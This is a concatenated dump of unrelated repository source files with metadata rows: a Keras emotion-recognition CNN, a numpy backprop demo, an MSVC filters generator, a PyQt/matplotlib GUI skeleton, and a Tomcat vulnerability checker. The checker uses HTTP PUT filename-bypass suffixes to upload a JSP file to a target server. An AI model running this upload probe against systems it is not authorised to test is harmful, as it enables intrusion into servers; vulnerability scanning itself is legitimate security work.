" THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
" IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
" ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
" LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
" CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
" SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
" INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
" CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
" ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
" POSSIBILITY OF SUCH DAMAGE.
" -----------------------------------------------------------------------------
"
" Description: A VGG like network to extract facial expressions from the FER 2013 dataset and learn
6 primary emotions (NOTE: we are merging 'anger' and 'disgust' into a single dataset
due to lack of examples
====================================================================================
Network Description:
1) 8 Convolution layers (grouped as 2 x 4)
2) 4 Maxpool layers
3) 2 Densely connected layers
4) 1 output layer with 6 classes
====================================================================================
" Author: Ratnajit Mukherjee, ratnajitmukherjee@gmail.com
" Date: July 2018
"""
# various imports to build the Neural Net
from keras.layers import Conv2D, Dense, Flatten, Dropout, BatchNormalization, MaxPooling2D
from keras.layers.advanced_activations import LeakyReLU
from keras.utils import plot_model
from keras.models import Sequential
from keras import backend as K
import argparse
import numpy as np
def Emonet(num_classes):
    """Build a VGG-like CNN for facial-expression recognition on 48x48
    grayscale inputs.

    Architecture: four blocks of (Conv2D -> LeakyReLU -> BatchNorm) x2
    followed by MaxPool + Dropout, then two 256-unit dense layers and a
    softmax output.

    :param num_classes: number of emotion classes in the output layer.
    :returns: the (uncompiled) :class:`keras.models.Sequential` model.
    """
    emonet = Sequential()

    # (filters, dropout-rate) for each of the four convolutional blocks.
    conv_blocks = [(32, 0.3), (64, 0.3), (128, 0.25), (256, 0.25)]
    for block_index, (filters, dropout_rate) in enumerate(conv_blocks):
        for conv_index in range(2):
            if block_index == 0 and conv_index == 0:
                # The very first layer carries the input shape.
                emonet.add(Conv2D(filters=filters, kernel_size=3, padding='same',
                                  activation='linear', input_shape=(48, 48, 1)))
            else:
                emonet.add(Conv2D(filters=filters, kernel_size=3, padding='same',
                                  activation='linear'))
            emonet.add(LeakyReLU(alpha=0.3))
            emonet.add(BatchNormalization(axis=-1))
        emonet.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
        emonet.add(Dropout(dropout_rate))

    # Classifier head: two 256-unit dense layers plus the softmax output.
    emonet.add(Flatten())
    for _ in range(2):
        emonet.add(Dense(256, activation='linear'))
        emonet.add(LeakyReLU(alpha=0.3))
        emonet.add(BatchNormalization(axis=-1))
        emonet.add(Dropout(0.5))
    emonet.add(Dense(num_classes, activation='softmax'))

    trainable_count = int(
        np.sum([K.count_params(p) for p in set(emonet.trainable_weights)]))
    non_trainable_count = int(
        np.sum([K.count_params(p) for p in set(emonet.non_trainable_weights)]))

    # network summary
    print('\n\n---<summary>---')
    print('\n Layers: \n\tConvolution2D: {0}\n\tMaxPooling2D: {1}\n\tFully Connected Layers: {2}'.format(8, 4, 2))
    print('\n Total params: {:,}'.format(trainable_count + non_trainable_count))
    print('\n Trainable params: {:,}'.format(trainable_count))
    print('\n Non-trainable params: {:,}'.format(non_trainable_count))
    print('\n\n---</summary>---')
    return emonet
def Emonet_extend(num_classes):
    """
    Larger, optional variant of :func:`Emonet` (2-3-4-4 convolution blocks and
    two 2048-unit dense layers). Practically less useful than the smaller
    model and not called by the application — kept for experimental purposes.
    """
    emonet = Sequential()

    # (filters, number of conv layers, dropout-rate) for each block.
    conv_blocks = [(64, 2, 0.2), (128, 3, 0.2), (256, 4, 0.3), (512, 4, 0.2)]
    for block_index, (filters, n_convs, dropout_rate) in enumerate(conv_blocks):
        for conv_index in range(n_convs):
            if block_index == 0 and conv_index == 0:
                # The very first layer carries the input shape.
                emonet.add(Conv2D(filters=filters, kernel_size=3, padding='same',
                                  activation='linear', input_shape=(48, 48, 1)))
            else:
                emonet.add(Conv2D(filters=filters, kernel_size=3, padding='same',
                                  activation='linear'))
            emonet.add(LeakyReLU(alpha=0.3))
            emonet.add(BatchNormalization(axis=-1))
        emonet.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
        emonet.add(Dropout(dropout_rate))

    # Classifier head: two 2048-unit dense layers plus the softmax output.
    emonet.add(Flatten())
    for _ in range(2):
        emonet.add(Dense(2048, activation='linear'))
        emonet.add(LeakyReLU(alpha=0.3))
        emonet.add(BatchNormalization(axis=-1))
        emonet.add(Dropout(0.5))
    emonet.add(Dense(num_classes, activation='softmax'))

    trainable_count = int(
        np.sum([K.count_params(p) for p in set(emonet.trainable_weights)]))
    non_trainable_count = int(
        np.sum([K.count_params(p) for p in set(emonet.non_trainable_weights)]))

    # network summary (NOTE: the layer counts printed below are inherited from
    # the smaller model and do not reflect this architecture)
    print('\n\n---<summary>---')
    print('\n Layers: \n\tConvolution2D: {0}\n\tMaxPooling2D: {1}\n\tFully Connected Layers: {2}'.format(8, 4, 2))
    print('\n Total params: {:,}'.format(trainable_count + non_trainable_count))
    print('\n Trainable params: {:,}'.format(trainable_count))
    print('\n Non-trainable params: {:,}'.format(non_trainable_count))
    print('\n\n---</summary>---')
    return emonet
"""
Using a main function for testing individual modules
Uncomment for testing purposes
Comment when testing is successful
"""
if __name__ == '__main__':
    # Command-line entry point: build the network and optionally dump its
    # architecture diagram.
    parser = argparse.ArgumentParser()
    parser.add_argument("-n", "--num_emotions", help="Number of emotions in the output layer of the VGG like NN",
                        type=int, default=7, required=True)
    parser.add_argument("-o", "--out_img", type=str, help="Output path to dump the Network Architecture")
    args = parser.parse_args()
    num_emotions = args.num_emotions
    out_img_path = args.out_img

    # BUGFIX: the original used "num_emotions is not 6/7" — identity
    # comparison against int literals, which only works by accident of
    # CPython's small-int caching. Use a value membership test instead.
    if num_emotions not in (6, 7):
        print("\n Number of emotions options are: \n 6 (for merging anger and disgust) "
              "OR \n 7 (for all the emotions in the dataset")
        exit(0)
    else:
        emonet = Emonet(num_classes=num_emotions)
        emonet.summary()
        if out_img_path is not None:
            plot_model(model=emonet, to_file=out_img_path, show_shapes=True, show_layer_names=True)
| [
"ratnajitmukherjee@gmail.com"
] | ratnajitmukherjee@gmail.com |
e5fb1f72e9850b7e778c6e302a06e49f892d630d | 6c219c027c7d0ef454bdeac196bd773e8b95d602 | /system/tomcat/tomcat_put_exec.py | 5d95b87eb442bce192ffbb30043ed14ef2a86d4f | [] | no_license | aStrowxyu/pocscan | 663f3a3458140e1bce7b4dc3702c6014a4c9ac92 | 08c7e7454c6b7c601bc54c21172c4788312603b1 | refs/heads/master | 2020-04-19T10:00:56.569105 | 2019-01-29T09:31:31 | 2019-01-29T09:31:31 | 168,127,418 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,561 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: Tomcat代码执行漏洞(CVE-2017-12616)
referer: https://mp.weixin.qq.com/s/dgWT3Cgf1mQs-IYxeID_Mw
author: Lucifer
description: 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
影响版本:Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)。
'''
import sys
import time
import hashlib
import requests
import datetime
import warnings
from termcolor import cprint
class tomcat_put_exec_BaseVerify:
    """Probe for the Tomcat arbitrary JSP upload flaw (CVE-2017-12616 family)
    by issuing HTTP PUT requests with the two known filename-bypass suffixes
    (``::$DATA`` and a trailing slash)."""

    def __init__(self, url):
        self.url = url

    def _try_put(self, suffix, post_data, headers):
        """Attempt one PUT upload using ``suffix`` appended to a
        timestamp-derived JSP name, and report the outcome."""
        time_stamp = time.mktime(datetime.datetime.now().timetuple())
        m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
        md5_str = m.hexdigest()
        vulnurl = self.url + "/" + md5_str + suffix
        try:
            req = requests.put(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            # 201 Created means the JSP was written => vulnerable.
            if req.status_code == 201:
                cprint("[+]存在Tomcat代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tshellpath: "+self.url+"/"+md5_str+".jsp", "red")
            else:
                cprint("[-]不存在tomcat_put_exec漏洞", "white", "on_grey")
        except Exception:
            # Narrowed from a bare "except:" so KeyboardInterrupt/SystemExit
            # still propagate.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")

    def run(self):
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        post_data = "thisisashell"
        # The two classic readonly-bypass suffixes; the original duplicated
        # the whole request block once per suffix.
        for suffix in (".jsp::$DATA", ".jsp/"):
            self._try_put(suffix, post_data, headers)
if __name__ == "__main__":
    # Silence the InsecureRequestWarning triggered by verify=False requests.
    warnings.filterwarnings("ignore")
    # The target base URL is taken from the first command-line argument.
    testVuln = tomcat_put_exec_BaseVerify(sys.argv[1])
    testVuln.run()
| [
"wangxinyu@vackbot.com"
] | wangxinyu@vackbot.com |
f2c796ddb9f18a239749ee30bb1004db5eba1baf | 5b4da825e536f570a464ae9f5d7f377fc16e12b7 | /externals/mpir-3.0.0/build.vc/_msvc_filters.py | 157096464eebc2a0cc84e80577c608dc607e2a80 | [
"LGPL-3.0-or-later",
"LicenseRef-scancode-other-copyleft",
"LGPL-2.1-or-later",
"GPL-2.0-only",
"LGPL-3.0-only",
"GPL-3.0-only",
"LGPL-2.1-only",
"BSD-3-Clause",
"Apache-2.0",
"MIT"
] | permissive | JaminChan/eos_win | 9ecb3fe7d1fbb52340e7b8df42b2d3d6695930a6 | c03e57151cfe152d0d3120abb13226f4df74f37e | refs/heads/master | 2020-03-24T20:38:49.539494 | 2018-09-06T10:13:16 | 2018-09-06T10:13:16 | 142,989,586 | 0 | 0 | MIT | 2018-09-04T06:49:10 | 2018-07-31T09:02:44 | C++ | UTF-8 | Python | false | false | 2,575 | py | # generate Visual Studio IDE Filter
from os import makedirs
from os.path import dirname, normpath, join, split, relpath
from errno import EEXIST
def filter_folders(cf_list, af_list, outf):
    """Write the <Filter> folder declarations of a .vcxproj.filters file.

    :param cf_list: C source tuples (name, ext, subdir).
    :param af_list: assembler source tuples (name, ext, subdir); when present,
        an extra 'mpn\\yasm' folder is declared.
    :param outf: writable text stream receiving the XML fragment.
    """
    header = r'''  <ItemGroup>
    <Filter Include="Header Files" />
    <Filter Include="Source Files" />
'''
    entry = r'''    <Filter Include="Source Files\{0:s}" />
'''
    footer = r'''  </ItemGroup>
'''
    folders = {item[2] for item in cf_list}
    if af_list:
        folders.add(r'mpn\yasm')
    outf.write(header)
    for folder in sorted(folders):
        if not folder:
            continue
        # 'mpn\generic' sources are displayed directly under 'mpn'.
        display = r'mpn' if folder == r'mpn\generic' else folder
        outf.write(entry.format(display))
    outf.write(footer)
def filter_headers(hdr_list, relp, outf):
    """Write <ClInclude> entries filing each header under "Header Files".

    :param hdr_list: header file names.
    :param relp: relative path prefix prepended to each file name.
    :param outf: writable text stream receiving the XML fragment.
    """
    header = r'''  <ItemGroup>
'''
    entry = r'''    <ClInclude Include="{}{}">
      <Filter>Header Files</Filter>
    </ClInclude>
'''
    footer = r'''  </ItemGroup>
'''
    outf.write(header)
    for hdr in hdr_list:
        outf.write(entry.format(relp, hdr))
    outf.write(footer)
def filter_csrc(cf_list, relp, outf):
    """Write <ClCompile> entries for C sources under "Source Files".

    Sources with a sub-directory are filed under "Source Files\\<subdir>",
    except that any subdir ending in 'generic' is displayed as 'mpn'.

    :param cf_list: C source tuples (name, ext, subdir).
    :param relp: relative path prefix prepended to each file path.
    :param outf: writable text stream receiving the XML fragment.
    """
    header = r'''  <ItemGroup>
'''
    entry_root = r'''    <ClCompile Include="{}{}">
      <Filter>Source Files</Filter>
    </ClCompile>
'''
    entry_sub = r'''    <ClCompile Include="{}{}\{}">
      <Filter>Source Files\{}</Filter>
    </ClCompile>
'''
    footer = r'''  </ItemGroup>
'''
    outf.write(header)
    for item in cf_list:
        fname = item[0] + item[1]
        subdir = item[2]
        if not subdir:
            outf.write(entry_root.format(relp, fname))
        else:
            display = 'mpn' if subdir.endswith('generic') else subdir
            outf.write(entry_sub.format(relp, subdir, fname, display))
    outf.write(footer)
def filter_asrc(af_list, relp, outf):
    """Write <YASM> entries filing assembler sources under
    "Source Files\\mpn\\yasm".

    :param af_list: assembler source tuples (name, ext, subdir).
    :param relp: relative path prefix prepended to each file path.
    :param outf: writable text stream receiving the XML fragment.
    """
    header = r'''  <ItemGroup>
'''
    entry = r'''    <YASM Include="{0:s}{2:s}\{1:s}">
      <Filter>Source Files\mpn\yasm</Filter>
    </YASM>
'''
    footer = r'''  </ItemGroup>
'''
    outf.write(header)
    for item in af_list:
        outf.write(entry.format(relp, item[0] + item[1], item[2]))
    outf.write(footer)
def gen_filter(path, root_dir, hf_list, cf_list, af_list, tools_ver):
    """Generate a Visual Studio .vcxproj.filters file at ``path``.

    :param path: output file path (the parent directory is created on demand).
    :param root_dir: project root used to compute the relative include prefix.
    :param hf_list: header file names.
    :param cf_list: C source tuples (name, ext, subdir).
    :param af_list: assembler source tuples (name, ext, subdir).
    :param tools_ver: MSBuild ToolsVersion written into the <Project> header.
    """
    f1 = r'''<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="{0}" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
'''.format(tools_ver)
    f2 = r'''  <ItemGroup>
    <None Include="..\..\gmp-h.in" />
  </ItemGroup>
</Project>
'''
    # Prefix that re-bases include paths relative to the output location.
    relp = split(relpath(root_dir, path))[0] + '\\'
    try:
        makedirs(split(path)[0])
    except IOError as e:
        # An already-existing directory is fine; re-raise anything else.
        # (IOError is an alias of OSError on Python 3.)
        if e.errno != EEXIST:
            raise
        else:
            pass
    with open(path, 'w') as outf:
        outf.write(f1)
        filter_folders(cf_list, af_list, outf)
        if hf_list:
            filter_headers(hf_list, relp, outf)
        filter_csrc(cf_list, relp, outf)
        if af_list:
            filter_asrc(af_list, relp, outf)
        outf.write(f2)
| [
"349683504@qq.com"
] | 349683504@qq.com |
b9a8e6a1e4bfebb2091a2ec6418f80fb1a3ea0f5 | 241da0606773b46c9f9f1ccdf345373709cbe98a | /backprop/backprop.py | 1fc27127c15f400184f09106bc97eb9e55b419ff | [] | no_license | farshadsafavi/DeepLearning | 86491f47218df2d61d38326370cf2a1e3204f367 | 880ed5ed1eeabc5946b0946fedf40575f8f2df4e | refs/heads/master | 2020-05-28T07:07:48.370798 | 2019-06-01T22:19:57 | 2019-06-01T22:19:57 | 188,916,650 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,331 | py | import numpy as np
def sigmoid(x):
    """Logistic sigmoid activation: 1 / (1 + e^(-x)); works element-wise on
    numpy arrays as well as on scalars."""
    return 1 / (np.exp(-x) + 1)
# One example input, its training target and the learning rate.
x = np.array([0.5, 0.1, -0.2])
target = 0.6
learnrate = 0.5

# Weight matrices: 3 inputs -> 2 hidden units -> 1 output unit.
weights_input_hidden = np.array([[0.5, -0.6],
                                 [0.1, -0.2],
                                 [0.1, 0.7]])

weights_hidden_output = np.array([0.1, -0.3])

## Forward pass
hidden_layer_input = np.dot(x, weights_input_hidden)
hidden_layer_output = sigmoid(hidden_layer_input)

output_layer_in = np.dot(hidden_layer_output, weights_hidden_output)
output = sigmoid(output_layer_in)

## Backwards pass
## Output error (prediction residual)
error = target - output

# Error term for the output layer: error * sigmoid'(output_layer_in),
# using sigmoid'(z) = sigmoid(z) * (1 - sigmoid(z)).
output_error_term = error*(output)*(1 - output)

# Error term for the hidden layer: backpropagate the output error term
# through the hidden->output weights, scaled by the local sigmoid gradient.
hidden_error_term = np.dot(output_error_term, weights_hidden_output)*hidden_layer_output*(1-hidden_layer_output)

# Gradient-descent step for the hidden->output weights.
delta_w_h_o = learnrate * output_error_term * hidden_layer_output

# Gradient-descent step for the input->hidden weights
# (outer product realised via broadcasting with x[:, None]).
delta_w_i_h = learnrate * hidden_error_term * x[:, None]

print('Change in weights for hidden layer to output layer:')
print(delta_w_h_o)
print('Change in weights for input layer to hidden layer:')
print(delta_w_i_h)
| [
"farshadtom2003@gmail.com"
] | farshadtom2003@gmail.com |
99d4e37e0d66355af8f0a5232e0a8b75df8ecdd0 | 4539b71e48ec47526f7f3834098e491383096fcd | /DemoUIonly-PythonQt/chap14matplotlib/Demo14_2Detail/myMainWindow.py | d7a681172d064cd1507c14f78d451967de8ba6bb | [] | no_license | likeke201/qt_code | e4d5ae8894153ae7a92e4ffdc01612c0aeb7510b | e0244558764bbbcc3646e828a907cdb1cdee6225 | refs/heads/master | 2022-12-06T11:23:38.068457 | 2020-08-30T05:16:12 | 2020-08-30T05:16:12 | 291,404,725 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,229 | py | # -*- coding: utf-8 -*-
import sys
from PyQt5.QtWidgets import (QApplication, QMainWindow,
QSplitter, QColorDialog, QLabel, QComboBox)
from PyQt5.QtCore import pyqtSlot,Qt
from PyQt5.QtGui import QColor
import numpy as np
import matplotlib as mpl
import matplotlib.style as mplStyle #一个模块
from matplotlib.backends.backend_qt5agg import (FigureCanvas,
NavigationToolbar2QT as NavigationToolbar)
from ui_MainWindow import Ui_MainWindow
class QmyMainWindow(QMainWindow):
def __init__(self, parent=None):
    """Construct the main window, build the Designer-generated UI and
    configure matplotlib for CJK-capable text rendering."""
    super().__init__(parent)    # call the base-class constructor, create the window
    self.ui=Ui_MainWindow()     # create the UI object
    self.ui.setupUi(self)       # build the UI
    self.setWindowTitle("Demo14_2, 绘图主要对象的操作")
    mplStyle.use("classic")     # the style must be applied before plotting; fonts are set afterwards so Chinese text renders
    mpl.rcParams['font.sans-serif']=['KaiTi','SimHei'] # render CJK text with KaiTi/SimHei (these fonts ignore bold/italic settings)
    mpl.rcParams['font.size']=12
    ## Some fonts that ship with Windows:
    ## SimHei (黑体), SimSun (宋体), NSimSun (新宋体), FangSong (仿宋), KaiTi (楷体)
    mpl.rcParams['axes.unicode_minus'] =False # use an ASCII hyphen for the minus sign so it renders with CJK fonts
    pass
## ==============自定义功能函数========================
def __createFigure(self):
pass
def __getMag(self, w, zta=0.2, wn=1.0):  ##计算幅频曲线的数据
    """Magnitude (in dB) of a standard second-order system at angular
    frequency ``w`` with damping ratio ``zta`` and natural frequency ``wn``:
    -20*log10( sqrt((1 - (w/wn)^2)^2 + (2*zta*w/wn)^2) ).
    """
    w_sq = w * w
    real_part = 1 - w_sq / (wn * wn)           # 1 - (w/wn)^2
    real_sq = real_part * real_part
    imag_sq = 4 * zta * zta / (wn * wn) * w_sq  # (2*zta*w/wn)^2
    amplitude = np.sqrt(real_sq + imag_sq)
    return -20 * np.log10(amplitude)            # in dB
def __drawFig2X1(self): ##初始化绘图
pass
## ==============event处理函数==========================
## ==========由connectSlotsByName()自动连接的槽函数============
##=====ToolBox 第1组:==="Figure操作" 分组里的功能================
##=======1.1 suptitle 图表的标题
def __setFig_suptitle(self,refreshDraw=True): #设置suptitle
pass
@pyqtSlot(bool) ##"1.1 suptitle标题"groupBox
def on_groupBox_suptitle_clicked(self,checked):
pass
@pyqtSlot() ##"设置标题"按钮
def on_btnFig_Title_clicked(self):
self.__setFig_suptitle()
@pyqtSlot(int) ##字体大小
def on_spinFig_Fontsize_valueChanged(self,arg1):
self.__setFig_suptitle()
@pyqtSlot(bool) ##粗体
def on_chkBoxFig_Bold_clicked(self,checked):
self.__setFig_suptitle()
@pyqtSlot(bool) ##斜体
def on_chkBoxFig_Italic_clicked(self,checked):
self.__setFig_suptitle()
@pyqtSlot() ##文字颜色
def on_btnFig_TitleColor_clicked(self):
pass
@pyqtSlot() ##文字背景颜色
def on_btnFig_TitleBackColor_clicked(self):
pass
##=======1.2 背景与边框
@pyqtSlot(bool) ##set_frameon, 显示背景和边框
def on_chkBoxFig_FrameOn_clicked(self,checked):
pass
@pyqtSlot() ##set_facecolor 设置背景颜色
def on_btnFig_FaceColor_clicked(self):
pass
@pyqtSlot(str) ##设置样式
def on_comboFig_Style_currentIndexChanged(self,arg1):
pass
##=====1.3 边距,子图间隔
@pyqtSlot()    ## tight_layout — experimental feature
def on_btnFigure_tightLayout_clicked(self):
    # Re-pack all subplots once, then repaint the canvas.
    self.__fig.tight_layout() # run tight_layout once over all subplots
    self.__fig.canvas.draw()  # refresh
@pyqtSlot(float)    ## left margin
def on_spinFig_marginLeft_valueChanged(self, value):
    # Move the figure's left margin (fraction of figure width) and repaint.
    self.__fig.subplots_adjust(left=value)
    self.__fig.canvas.draw()
@pyqtSlot(float)    ## right margin
def on_spinFig_marginRight_valueChanged(self, value):
    # Move the figure's right margin (fraction of figure width) and repaint.
    self.__fig.subplots_adjust(right=value)
    self.__fig.canvas.draw()
@pyqtSlot(float)    ## bottom margin
def on_spinFig_marginBottom_valueChanged(self, value):
    # Move the figure's bottom margin (fraction of figure height) and repaint.
    self.__fig.subplots_adjust(bottom=value)
    self.__fig.canvas.draw()
@pyqtSlot(float)    ## top margin
def on_spinFig_marginTop_valueChanged(self, value):
    # Move the figure's top margin (fraction of figure height) and repaint.
    self.__fig.subplots_adjust(top=value)
    self.__fig.canvas.draw()
@pyqtSlot(float)    ## wspace
def on_spinFig_wspace_valueChanged(self, value):
    # Adjust the horizontal spacing between subplots and repaint.
    self.__fig.subplots_adjust(wspace=value)
    self.__fig.canvas.draw()
@pyqtSlot(float)    ## hspace
def on_spinFig_hspace_valueChanged(self, value):
    # Adjust the vertical spacing between subplots and repaint.
    self.__fig.subplots_adjust(hspace=value)
    self.__fig.canvas.draw()
##=====ToolBox 第2组:"Axes子图操作" 分组里的功能================
@pyqtSlot(bool) ##子图是否可见
def on_chkBoxAxes_Visible_clicked(self,checked):
pass
##=======2.1 子图标题
def __setAxesTitle(self):
pass
@pyqtSlot(bool) ##"子图标题"GroupBox--CheckBox
def on_groupBox_AxesTitle_clicked(self,checked):
pass
@pyqtSlot() ##"设置标题"按钮
def on_btnAxes_Title_clicked(self):
self.__setAxesTitle() #设置标题
@pyqtSlot(int) ##字体大小
def on_spinAxes_Fontsize_valueChanged(self,arg1):
self.__setAxesTitle()
@pyqtSlot(bool) ##粗体
def on_chkBoxAxes_Bold_clicked(self,checked):
self.__setAxesTitle()
@pyqtSlot(bool) ##斜体
def on_chkBoxAxes_Italic_clicked(self,checked):
self.__setAxesTitle()
@pyqtSlot() ##文字颜色
def on_btnAxes_TitleColor_clicked(self):
pass
@pyqtSlot() ##文字背景颜色
def on_btnAxes_TitleBackColor_clicked(self):
pass
##=======2.2 子图外观
@pyqtSlot(bool) ##set_frame_on, 是否显示背景颜色
def on_chkBoxAxes_FrameOn_clicked(self,checked):
pass
@pyqtSlot() ##set_facecolor 设置背景颜色
def on_btnAxes_FaceColor_clicked(self):
pass
@pyqtSlot(bool) ##grid(),设置X网格可见性
def on_chkBoxAxes_GridX_clicked(self,checked):
pass
@pyqtSlot(bool) ##grid(), 设置Y网格可见性
def on_chkBoxAxes_GridY_clicked(self,checked):
pass
@pyqtSlot(bool) ##set_axis_on和 set_axis_off 显示/隐藏坐标轴
def on_chkBoxAxes_AxisOn_clicked(self,checked):
pass
@pyqtSlot(bool) ## minorticks_on 和 minorticks_off 显示/隐藏次刻度和网格
def on_chkBoxAxes_MinorTicksOn_clicked(self,checked):
pass
##======2.3 图例
@pyqtSlot(bool) ##图例可见
def on_groupBox_AexLegend_clicked(self,checked):
pass
@pyqtSlot(int) ##图例位置
def on_combo_LegendLoc_currentIndexChanged(self,index):
pass
@pyqtSlot(bool) ##图例可拖动
def on_chkBoxLegend_Dragable_clicked(self,checked):
pass
@pyqtSlot() ##重新生成图例
def on_btnLegend_regenerate_clicked(self):
pass
##=====ToolBox 第3组:"子图曲线设置" 分组里的功能================
##======3.1 选择操作的曲线
@pyqtSlot(int) ##选择当前操作曲线
def on_comboAxes_Lines_currentIndexChanged(self,index):
pass
##======3.2 曲线外观
@pyqtSlot(bool) ##曲线可见
def on_groupBox_LineSeries_clicked(self,checked):
pass
@pyqtSlot(str) ##set_linestyle
def on_comboSeries_LineStyle_currentIndexChanged(self,arg1):
pass
@pyqtSlot(int) ##线宽
def on_spinSeries_LineWidth_valueChanged(self,arg1):
pass
@pyqtSlot(str) ##set_drawstyle()
def on_comboSeries_DrawStyle_currentIndexChanged(self,arg1):
pass
@pyqtSlot() ##设置曲线颜色
def on_btnSeries_LineColor_clicked(self):
pass
##======3.3 标记点
@pyqtSlot(bool) ##标记点可见
def on_groupBox_Marker_clicked(self,checked):
pass
@pyqtSlot(str) ##set_marker 标记点形状
def on_comboMarker_Shape_currentIndexChanged(self,arg1):
pass
@pyqtSlot(int) ##set_markersize 标记点大小
def on_spinMarker_Size_valueChanged(self,arg1):
pass
@pyqtSlot() ##标记点颜色
def on_btnMarker_Color_clicked(self):
pass
@pyqtSlot(int) ##set_markeredgewidth 边线线宽
def on_spinMarker_EdgeWidth_valueChanged(self,arg1):
pass
@pyqtSlot() ##set_markeredgecolor边线颜色
def on_btnMarker_EdgeColor_clicked(self):
pass
##=====ToolBox 第4组:==="X坐标轴设置" 分组里的功能================
@pyqtSlot(bool) ##axisX 坐标轴可见型,包括label,tick,ticklabels
def on_groupBox_AxisX_clicked(self,checked):
pass
##======4.1 数据范围======
@pyqtSlot() ## set_xbound 设置范围,与set_xlim,它不管是否反向
def on_btnAxisX_setBound_clicked(self):
pass
@pyqtSlot() ## invert_xaxis 反向toggle
def on_chkBoxAxisX_Invert_clicked(self):
pass
@pyqtSlot(str) ## 设置坐标尺度
def on_comboAxisX_Scale_currentIndexChanged(self,arg1):
pass
##==========4.2 X轴标题
def __setAxisX_Label(self,refreshDraw=True):
pass
@pyqtSlot(bool) ##X 轴标题可见性
def on_groupBox_AxisXLabel_clicked(self,checked):
pass
@pyqtSlot() ##设置X轴Label
def on_btnAxisX_setLabel_clicked(self):
self.__setAxisX_Label()
@pyqtSlot(int) ##字体大小
def on_spinAxisX_LabelFontsize_valueChanged(self,arg1):
self.__setAxisX_Label()
@pyqtSlot(bool) ##粗体
def on_chkBoxAxisX_LabelBold_clicked(self,checked):
self.__setAxisX_Label()
@pyqtSlot(bool) ##斜体
def on_chkBoxAxisX_LabelItalic_clicked(self,checked):
self.__setAxisX_Label()
@pyqtSlot() ##文字颜色
def on_btnAxisX_LabelColor_clicked(self):
color=QColorDialog.getColor() #QColor
if color.isValid():
r,g,b,a=color.getRgbF() #getRgbF(self) -> Tuple[float, float, float, float]
objText=self.__setAxisX_Label(False)
objText.set_color((r,g,b,a)) #文字颜色
self.__fig.canvas.draw()
##======4.3 X轴主刻度标签
@pyqtSlot(bool) ##"4.3主刻度标签"GroupBox,刻度标签可见性
def on_groupBoxAxisX_TickLabel_clicked(self,checked):
pass
@pyqtSlot() ##设置标签格式
def on_btnAxisX_TickLabFormat_clicked(self):
pass
@pyqtSlot() ##文字颜色
def on_btnAxisX_TickLabColor_clicked(self):
pass
@pyqtSlot(int) ##字体大小
def on_spinAxisX_TickLabelFontsize_valueChanged(self,arg1):
pass
@pyqtSlot(bool) ## bottom axis major ticklabel
def on_chkBoxAxisX_TickLabBottom_clicked(self,checked):
pass
@pyqtSlot(bool) ## top axis major ticklabel
def on_chkBoxAxisX_TickLabTop_clicked(self,checked):
pass
##==========4.4 ===主刻度线和主网格线
@pyqtSlot(bool) ##bottom主刻度线
def on_chkBoxX_majorTickBottom_clicked(self,checked):
pass
@pyqtSlot(bool) ##top主刻度线
def on_chkBoxX_majorTickTop_clicked(self,checked):
pass
@pyqtSlot() ##主刻度线颜色
def on_btnLineColorX_majorTick_clicked(self):
pass
@pyqtSlot(bool) ##显示主网格线
def on_chkBoxX_majorGrid_clicked(self,checked):
pass
@pyqtSlot() ##主网格线颜色
def on_btnLineColorX_majorGrid_clicked(self):
pass
@pyqtSlot(str) ##主网格线样式
def on_comboLineStyle_XmajorGrid_currentIndexChanged(self,arg1):
pass
##==========4.5 次刻度线和次网格线
@pyqtSlot(bool) ##bottom次刻度线
def on_chkBoxX_minorTickBottom_clicked(self,checked):
pass
@pyqtSlot(bool) ##top次刻度线
def on_chkBoxX_minorTickTop_clicked(self,checked):
pass
@pyqtSlot() ##次刻度线颜色
def on_btnLineColorX_minorTick_clicked(self):
pass
@pyqtSlot(bool) ##显示次网格线
def on_chkBoxX_minorGrid_clicked(self,checked):
pass
@pyqtSlot() ##次网格线颜色
def on_btnLineColorX_minorGrid_clicked(self):
pass
@pyqtSlot(str) ##次网格线样式
def on_comboLineStyle_XminorGrid_currentIndexChanged(self,arg1):
pass
##=====ToolBox 第5组:==="Y坐标轴设置" 分组里的功能================
@pyqtSlot(bool) ## axisY 坐标轴可见型,包括label,tick,ticklabels
def on_groupBox_AxisY_clicked(self,checked):
pass
##======5.1 数据范围======
@pyqtSlot() ## set_xbound 设置范围,与set_xlim,它不管是否反向
def on_btnAxisY_setBound_clicked(self):
pass
@pyqtSlot() ## invert_xaxis 反向toggle
def on_chkBoxAxisY_Invert_clicked(self):
pass
@pyqtSlot(str) ## 设置坐标尺度
